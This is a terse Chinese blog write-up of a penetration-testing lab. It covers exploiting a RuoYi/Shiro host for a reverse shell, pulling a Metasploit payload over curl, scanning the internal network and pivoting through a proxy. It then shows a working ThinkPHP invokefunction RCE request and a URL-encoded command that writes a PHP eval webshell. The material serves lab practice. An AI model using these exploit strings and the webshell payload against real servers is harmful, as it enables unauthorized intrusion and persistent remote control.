外网靶场2
信息收集
cms
发现是若依

web 渗透
根据信息收集获取的数据,直接使用shiro 尝试
利群利用

发现存在直接反弹shell

上线msf
生成payload
开启http服务

使用curl
1
curl http://ip:8000/file -O
执行

上线成功
内网信息收集
网段信息收集

fscan 一下


内网横向移动
搭建代理



成功
172.16.60.133

发现目标
开启浏览器代理

访问public

rce
1
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
写webshell
1
http://172.16.60.133/thinkphp/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%65%63%68%6f%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%5c%24%5f%50%4f%53%54%5b%63%63%63%5d%29%3b%3f%3e%22%20%3e%61%75%67%75%73%74%2e%70%68%70

忘记了是一个windwos 的机器
可以直接使用hta_server 尝试

还可以尝试使用powershell
外网靶场2
https://tsy244.github.io/2024/03/19/靶场记录/外网靶场2/